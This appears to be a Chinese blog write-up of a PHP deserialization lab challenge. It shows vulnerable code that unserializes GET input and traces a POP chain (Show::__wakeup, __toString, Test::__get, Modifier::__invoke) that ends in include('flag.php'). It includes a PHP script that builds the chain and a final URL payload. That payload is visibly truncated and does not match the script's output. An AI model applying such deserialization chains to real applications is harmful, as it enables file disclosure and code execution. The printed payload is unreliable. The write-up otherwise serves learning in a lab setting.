来自于橙子科技反序列化靶场

源代码如下:

<?php

//flag is in flag.php

highlight_file(__FILE__);

error_reporting(0);

class Modifier {

    private $var;

    public function append($value)

    {

        include($value);

        echo $flag;

    }

    public function __invoke(){

        $this->append($this->var);

    }

}

class Show{

    public $source;

    public $str;

    public function __toString(){

        return $this->str->source;

    }

    public function __wakeup(){

        echo $this->source;

    }

}

class Test{

    public $p;

    public function __construct(){

        $this->p = array();

    }

    public function __get($key){

        $function = $this->p;

        return $function();

    }

}

if(isset($_GET['pop'])){

    unserialize($_GET['pop']);

}

?>

第一步:找链尾

我们的目的是得到flag,直接找flag这个关键词,发现:

class Modifier {

    private $var;

    public function append($value)

    {

        include($value);

        echo $flag;

    }

    public function __invoke(){

        $this->append($this->var);

    }

}

注意echo $flag;,根据提示,flag存在于flag.php中,那我们需要做的是将这个文件include进来;
注意到include($value);显然这里的$value需要赋值为flag.php。完成这一步的前提是触发append函数。接下来的问题是,如何触发append函数。

第二步:如何触发append函数

向下寻找,发现__invoke魔术方法,这个魔术方法的触发条件是对象被当成函数一样调用,这样的话就会将var作为append的参量并触发append函数。

第三步:如何触发__invoke()函数

既然是要求对象被当成函数一样调用,纳闷我们就要找类似于_fun() _这样的东西。继续看代码,发现:

class Test{

    public $p;

    public function __construct(){

        $this->p = array();

    }

    public function __get($key){

        $function = $this->p;

        return $function();

    }

}

在__get方法中,有return $function();我们只要将$function的值赋为类Modifier的一个实例即可触发类Modifier中的__invoke方法。

第四步:如何触发__get()方法

了解到__get()魔术方法是用于从不可访问的属性读取数据,简单说来就是当程序调用类里面不存在的对象的时候会调用__get()方法。还是继续看程序,最好是找有连续调用的地方,方便我们进行赋值。注意到:

class Show{

    public $source;

    public $str;

    public function __toString(){

        return $this->str->source;

    }

    public function __wakeup(){

        echo $this->source;

    }

}

其中line5中,出现了连续调用return $this->str->source;我们可以将$str的值赋为类Test的一个实例,显然类Test中没有source对象,这样的话就能触发类中的__get方法了。

第五步:如何触发__toString()方法

__toString() 把类当作字符串使用时触发,返回值需要为字符串。
还是在源代码里面开找,找和字符串相关的语句。发现:

class Show{

    public $source;

    public $str;

    public function __toString(){

        return $this->str->source;

    }

    public function __wakeup(){

        echo $this->source;

    }

}

其中__wakeup()方法中,echo $this->source;。只要我们将source的值赋为类Show的一个实例即可调用类Show中的__toString()方法。

第六步(链首):如何触发__wakeup()方法

最简单的一集,使用unserialize()时触发

使用反推法整理完这六步之后,下面开始构造POC
首先对源代码进行处理,如下:

<?php

class Modifier {

    private $var;

}

class Show{

    public $source;

    public $str;

}

class Test{

    public $p;

}

?>

删去不必要的方法和语句。
然后进行popchain构造。

<?php

class Modifier {

    private $var="flag.php";

}

class Show{

    public $source;

    public $str;

}

class Test{

    public $p;

}

$mod=new Modifier();

$show=new Show();

$test=new Test();

$test->p=$mod;

$show->str=$test;

$show->source=$show;

echo serialize($show);

?>

得到payload

?pop={s:1:"p";O:8:"Modifier":1:{s:13:"%00Modifier%00var";s:8:"flag.php";}}}

记一次php反序列化漏洞中的POPchain和POC构造实战的更多相关文章

  1. 实战经验丨PHP反序列化漏洞总结

    又到了金三银四跳槽季,很多小伙伴都开始为面试做准备,今天小编就给大家分享一个网安常见的面试问题:PHP反序列化漏洞. 虽然PHP反序列化漏洞利用的条件比较苛刻,但是一旦被利用就会产生很严重的后果,所以 ...

  2. 浅谈PHP反序列化漏洞原理

    序列化与反序列化 序列化用途:方便于对象在网络中的传输和存储 0x01 php反序列化漏洞 在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等. 常见的序列化格式: ...

  3. Python 反序列化漏洞学习笔记

    参考文章 一篇文章带你理解漏洞之 Python 反序列化漏洞 Python Pickle/CPickle 反序列化漏洞 Python反序列化安全问题 pickle反序列化初探 前言 上面看完,请忽略下 ...

  4. Java安全之Fastjson反序列化漏洞分析

    Java安全之Fastjson反序列化漏洞分析 首发:先知论坛 0x00 前言 在前面的RMI和JNDI注入学习里面为本次的Fastjson打了一个比较好的基础.利于后面的漏洞分析. 0x01 Fas ...

  5. Typecho 反序列化漏洞 分析及复现

    0x00 漏洞简介 CVE-2018-18753 漏洞概述: typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任 ...

  6. 应急响应--记录一次漏洞紧急处理中意外发现的挖矿木马(Shiro反序列化漏洞和ddg挖矿木马)

    背景 某公司线上服务器意外发现一个Apache Shiro 反序列化漏洞,可以直接GetShell.出于做安全的谨慎,马上出现场应急,确认漏洞.该漏洞存在在cookie字段中的rememberMe字段 ...

  7. Java审计之CMS中的那些反序列化漏洞

    Java审计之CMS中的那些反序列化漏洞 0x00 前言 过年这段时间比较无聊,找了一套源码审计了一下,发现几个有意思的点拿出来给分享一下. 0x01 XStream 反序列化漏洞 下载源码下来发现并 ...

  8. Java反序列化漏洞实现

    一.说明 以前去面试被问反序列化的原理只是笼统地答在参数中注入一些代码当其反序列化时被执行,其实“一些代码”是什么代码“反序列化”时为什么就会被执行并不懂:反来在运营商做乙方经常会因为java反反序列 ...

  9. ThinkPHP v6.0.x 反序列化漏洞利用

    前言: 上次做了成信大的安询杯第二届CTF比赛,遇到一个tp6的题,给了源码,目的是让通过pop链审计出反序列化漏洞. 这里总结一下tp6的反序列化漏洞的利用. 0x01环境搭建 现在tp新版本的官网 ...

  10. 反序列化漏洞问题研究之php篇

    php的反序列化反序列化漏洞又称php对象注入(php Object Injection)产生的问题主要分以下两类: 将传来的序列化数据直接unserilize,造成魔幻函数的执行.这种情况在一般的应 ...

随机推荐

  1. 【Azure 应用服务】应用服务中发布Docker Container,如何添加卷(如Azure File Share)以便永久存储文件

    问题描述 应用服务中发布Docker Container,如何添加卷(如Azure File Share)以便永久存储文件 问题解答 App Service可以通过门户配置Mount Storage, ...

  2. Jmeter json断言的使用

    1 添加方式:取样器右键->添加->断言->JSON断言 作用:使用JSON表达式提取实际数据与预期进行比较   2首先我们来了解下断言组件的各个功能: Asset JSON Pat ...

  3. 解决element-ui的date-picker组件的picker-options属性不生效的问题

    网上查半天都没查到,好像没人写,于是俺怀着激动的心情来记录下 项目来需求,说要控制日期选择的最大最小范围,看似简单,实则藏深坑! 小白的我天真地按照网上的例子(主要是官网也不给一个!)写完如下: 1. ...

  4. Spring事务(五)-事务隔离级别

    Spring @Transactional注解isolation属性 @Transactional注解通过isolation属性设置事务隔离级别.如下: @Transactional(isolatio ...

  5. PDF/Excel文件预览功能完整实现-java版本

    新需求 最近接到一个新的需求,说是之前直接下载的PDF文件或者是Excel文件,现在不能直接下载,需要实现在线预览功能. 前端人员拿到这个需求后,去看了一下以前的代码,以前调用的下载接口和PDF文件预 ...

  6. vscode 花括号 突出连接线 bracket 两个设置点 (括号标识符)

    vscode 花括号 突出连接线 bracket 两个设置点 外观 设置 设置里面搜索 bracket Editor - Guides: Highlight Active Bracket Pair E ...

  7. 软件发布时 生成发布日志文件 单点登录 getGitInfo.bat

    需求 每次发包的时候,前端是3个包,如果后期出现问题,不好回查 所以把当前项目的git信息记录下来 以便回查 第一次手动写了下,发现比较麻烦,所以写个脚本,每次发布的时候 运行下即可 上代码 软件发布 ...

  8. gradle安装单元测试坎坷历程

    参考,欢迎点击原文:https://blog.csdn.net/qq_42815122/article/details/85395111(灵感) 自己写的用户系统要加上单元测试,加就加吧,跟着网上的好 ...

  9. Linux快速入门(一)Linux基础知识

    我的环境:Ubuntu(后面涉及到的Linux均为Debian系列) Linux不同发行版的包管理方式 (1)Redhat系列:Redhat系列的包管理方式采用的是基于RPM包的YUM包管理方式 (2 ...

  10. 提升团队协作效率:欧奥PicHome打造无缝资料共享平台

    1. 引言 在快节奏的工作环境中,团队成员需要快速访问和共享信息.有效的资料共享不仅提高工作效率,还能促进团队协作和创新.然而,许多团队仍在使用传统的文件共享方法,这些方法往往效率低下,难以满足现代工 ...